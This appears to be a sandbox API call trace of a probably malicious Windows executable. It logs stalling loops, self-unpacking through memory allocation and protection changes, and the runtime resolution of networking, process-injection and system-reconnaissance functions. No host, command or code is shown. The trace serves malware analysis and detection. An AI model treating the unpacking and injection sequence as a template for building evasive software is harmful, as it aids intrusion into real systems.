	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.172] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.172] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.173] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x765a0000
	[0061.174] LoadLibraryA (lpLibFileName="k") returned 0x0
	[0061.204] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.204] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.204] LoadLibraryW (lpLibFileName="eappcfg.dll") returned 0x6ffa0000
	[0061.455] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.455] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x620000
	[0061.455] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x765a0000
	[0061.476] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0061.476] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0061.476] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0061.476] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x630000
	[0061.476] VirtualAlloc (lpAddress=0x0, dwSize=0x32e00, flAllocationType=0x1000, flProtect=0x4) returned 0x650000
	[0061.507] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x19fefc | out: lpflOldProtect=0x19fefc*=0x2) returned 1
	[0061.507] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x19fefc | out: lpflOldProtect=0x19fefc*=0x4) returned 1
	[0061.507] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x20) returned 1
	[0061.522] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x20, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0061.522] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0061.522] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x2, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0061.522] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0061.525] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0061.525] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0061.525] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0061.525] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0061.525] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0061.525] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x0
	[0061.525] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x702b0000
	[0063.454] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0063.454] GetProcAddress (hModule=0x702b0000, lpProcName="HttpQueryInfoA") returned 0x70351880
	[0063.454] GetProcAddress (hModule=0x702b0000, lpProcName="InternetQueryOptionA") returned 0x70357d00
	[0063.454] GetProcAddress (hModule=0x702b0000, lpProcName="InternetSetOptionA") returned 0x70351dc0
	[0063.454] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersA") returned 0x7032c3f0
	[0063.454] GetProcAddress (hModule=0x702b0000, lpProcName="InternetCloseHandle") returned 0x7037d200
	[0063.455] GetProcAddress (hModule=0x702b0000, lpProcName="HttpSendRequestA") returned 0x70378e60
	[0063.455] GetProcAddress (hModule=0x702b0000, lpProcName="InternetConnectA") returned 0x703f0da0
	[0063.455] GetProcAddress (hModule=0x702b0000, lpProcName="InternetReadFile") returned 0x70337320
	[0063.455] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersW") returned 0x7032bec0
	[0063.455] GetProcAddress (hModule=0x702b0000, lpProcName="InternetOpenW") returned 0x70378490
	[0063.455] GetProcAddress (hModule=0x702b0000, lpProcName="HttpOpenRequestW") returned 0x70330fd0
	[0063.455] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0063.455] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x74b20000
	[0063.455] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0063.455] GetProcAddress (hModule=0x74b20000, lpProcName="PathFindFileNameW") returned 0x74b37a50
	[0063.455] GetProcAddress (hModule=0x74b20000, lpProcName="StrCatW") returned 0x74b484a0
	[0063.455] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyW") returned 0x74b484e0
	[0063.455] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpIW") returned 0x74b34750
	[0063.456] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyNW") returned 0x74b433f0
	[0063.456] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrA") returned 0x74b43570
	[0063.456] GetProcAddress (hModule=0x74b20000, lpProcName="StrDupW") returned 0x74b39060
	[0063.456] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrIW") returned 0x74b381b0
	[0063.456] GetProcAddress (hModule=0x74b20000, lpProcName="StrRChrW") returned 0x74b3d1c0
	[0063.456] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpW") returned 0x74b35fe0
	[0063.456] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0063.456] GetModuleHandleA (lpModuleName="PSAPI.DLL") returned 0x0
	[0063.456] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x772c0000
	[0063.544] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0063.544] GetProcAddress (hModule=0x772c0000, lpProcName="GetProcessImageFileNameA") returned 0x772c16a0
	[0063.544] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0063.544] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0063.544] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0063.544] GetProcAddress (hModule=0x77960000, lpProcName="_chkstk") returned 0x779da570
	[0063.545] GetProcAddress (hModule=0x77960000, lpProcName="RtlAllocateHeap") returned 0x77992bd0
	[0063.545] GetProcAddress (hModule=0x77960000, lpProcName="RtlFreeHeap") returned 0x77990230
	[0063.545] GetProcAddress (hModule=0x77960000, lpProcName="memset") returned 0x779dcfe0
	[0063.545] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0063.545] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x0
	[0063.545] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x701e0000
	[0063.963] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0063.963] GetProcAddress (hModule=0x701e0000, lpProcName="CreateEnvironmentBlock") returned 0x701e4480
	[0063.964] GetProcAddress (hModule=0x701e0000, lpProcName="GetProfilesDirectoryW") returned 0x701e45a0
	[0063.964] GetProcAddress (hModule=0x701e0000, lpProcName="DestroyEnvironmentBlock") returned 0x701e4510
	[0063.964] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0063.964] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x0
	[0063.964] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x746c0000
	[0064.211] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0064.211] GetProcAddress (hModule=0x746c0000, lpProcName=0x34) returned 0x746f1110
	[0064.211] GetProcAddress (hModule=0x746c0000, lpProcName=0x2) returned 0x746d3230
	[0064.211] GetProcAddress (hModule=0x746c0000, lpProcName=0x3) returned 0x746cead0
	[0064.211] GetProcAddress (hModule=0x746c0000, lpProcName=0xb) returned 0x746c5240
	[0064.212] GetProcAddress (hModule=0x746c0000, lpProcName=0x17) returned 0x746ce6b0
	[0064.212] GetProcAddress (hModule=0x746c0000, lpProcName=0xf) returned 0x746c4a90
	[0064.212] GetProcAddress (hModule=0x746c0000, lpProcName=0x73) returned 0x746c6520
	[0064.212] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0064.212] GetModuleHandleA (lpModuleName="WINHTTP.dll") returned 0x0
	[0064.212] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x70210000
	[0064.471] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryDataAvailable") returned 0x702347a0
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReceiveResponse") returned 0x7021c8e0
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpen") returned 0x70246720
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpAddRequestHeaders") returned 0x70229400
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryHeaders") returned 0x702309c0
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReadData") returned 0x70234ea0
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpenRequest") returned 0x70248dd0
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSetOption") returned 0x702306f0
	[0064.471] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpCloseHandle") returned 0x70233ad0
	[0064.472] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSendRequest") returned 0x7023bfd0
	[0064.472] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpConnect") returned 0x70242880
	[0064.472] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0064.472] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x0
	[0064.472] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77490000
	[0064.567] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0064.567] GetProcAddress (hModule=0x77490000, lpProcName="NetApiBufferFree") returned 0x6ff916d0
	[0064.748] GetProcAddress (hModule=0x77490000, lpProcName="NetUserGetInfo") returned 0x6ff733a0
	[0064.870] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0064.870] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765a0000
	[0064.870] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0064.870] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtectEx") returned 0x765e2790
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAllocEx") returned 0x765e2730
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadReadPtr") returned 0x765b2510
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="GetCommandLineW") returned 0x765baba0
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="CreateMutexW") returned 0x765c66f0
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="CreateToolhelp32Snapshot") returned 0x765c7b50
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="Process32NextW") returned 0x765bd290
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="Process32FirstW") returned 0x765bf5a0
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeThread") returned 0x765c4f40
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="WriteProcessMemory") returned 0x765e2850
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalMemoryStatusEx") returned 0x765bafe0
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="OpenMutexW") returned 0x765c6770
	[0064.871] GetProcAddress (hModule=0x765a0000, lpProcName="MultiByteToWideChar") returned 0x765b2ad0
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersionExW") returned 0x765baa80
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="FormatMessageA") returned 0x765bf830
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpiA") returned 0x765b7830
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileAttributesW") returned 0x765c6a50
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="MoveFileExW") returned 0x765bb2b0
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="CopyFileW") returned 0x765c6ec0
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpW") returned 0x765b7970
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenW") returned 0x765b3690
	[0064.872] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableA") returned 0x765e22f0
	[0064.880] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemInfo") returned 0x765ba0f0
	[0064.880] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateThread") returned 0x765c0160
	[0064.880] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableA") returned 0x765ba8a0
	[0064.880] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileTime") returned 0x765c6a90
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemTime") returned 0x765c4940
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToFileTime") returned 0x765c4c10
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileSize") returned 0x765c6a70
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteFileW") returned 0x765c68c0
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="FindClose") returned 0x765c68e0
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="SetEndOfFile") returned 0x765c6c00
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="SetFilePointer") returned 0x765c6c40
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileTime") returned 0x765c6c60
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtect") returned 0x765b7a50
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcess") returned 0x765b38c0
	[0064.881] GetProcAddress (hModule=0x765a0000, lpProcName="ExpandEnvironmentStringsW") returned 0x765bcd50
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateProcess") returned 0x765c5100
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForMultipleObjects") returned 0x765c6800
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteAtom") returned 0x765bcb20
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenA") returned 0x765b8c80
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForSingleObject") returned 0x765c6820
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="ExitThread") returned 0x779c7a80
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleA") returned 0x765b99f0
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAddAtomW") returned 0x765b1be0
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="OpenProcess") returned 0x765b8bf0
	[0064.882] GetProcAddress (hModule=0x765a0000, lpProcName="ProcessIdToSessionId") returned 0x765b8fa0
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="Sleep") returned 0x765b7990
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="GetLastError") returned 0x765b3870
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryA") returned 0x765c4bf0
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="CloseHandle") returned 0x765c6630
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThread") returned 0x765b9b90
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcAddress") returned 0x765b78b0
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomW") returned 0x765b20f0
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessId") returned 0x765b23e0
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessHeap") returned 0x765b7710
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="CreateProcessW") returned 0x765bb000
	[0064.883] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleW") returned 0x765b9bc0
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibrary") returned 0x765b9f50
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeProcess") returned 0x765bfdb0
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemDirectoryW") returned 0x765b9fd0
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="OutputDebugStringA") returned 0x765bfde0
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyA") returned 0x765bea30
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="ExitProcess") returned 0x765c7b30
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="SetProcessPriorityBoost") returned 0x765bfef0
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="SetPriorityClass") returned 0x765b9e90
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleFileNameW") returned 0x765b9b00
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadPriority") returned 0x765b9990
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableW") returned 0x765b9970
	[0064.884] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThread") returned 0x765b75f0
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcatW") returned 0x765dd170
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAlloc") returned 0x765b9950
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFree") returned 0x765bccf0
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="LocalFree") returned 0x765b79a0
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyW") returned 0x765dd260
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpA") returned 0x765bcc30
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="ReadFile") returned 0x765c6bb0
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableW") returned 0x765be9e0
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempPathW") returned 0x765c6b30
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="CreateFileW") returned 0x765c6890
	[0064.885] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempFileNameW") returned 0x765c6b10
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="LocalAlloc") returned 0x765b7a30
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="HeapReAlloc") returned 0x7798efe0
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualFree") returned 0x765b7600
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAlloc") returned 0x765b7810
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="RemoveDirectoryW") returned 0x765c6bf0
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="WriteFile") returned 0x765c6ca0
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="DuplicateHandle") returned 0x765c6640
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="DisconnectNamedPipe") returned 0x765e0990
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="FlushFileBuffers") returned 0x765c69b0
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersion") returned 0x765baaf0
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="CreateEventW") returned 0x765c66b0
	[0064.886] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameW") returned 0x765c46a0
	[0064.887] GetProcAddress (hModule=0x765a0000, lpProcName="WideCharToMultiByte") returned 0x765b3880
	[0064.887] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0064.887] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameA") returned 0x765bfbf0
	[0064.887] GetProcAddress (hModule=0x765a0000, lpProcName="GetShortPathNameW") returned 0x765b2b90
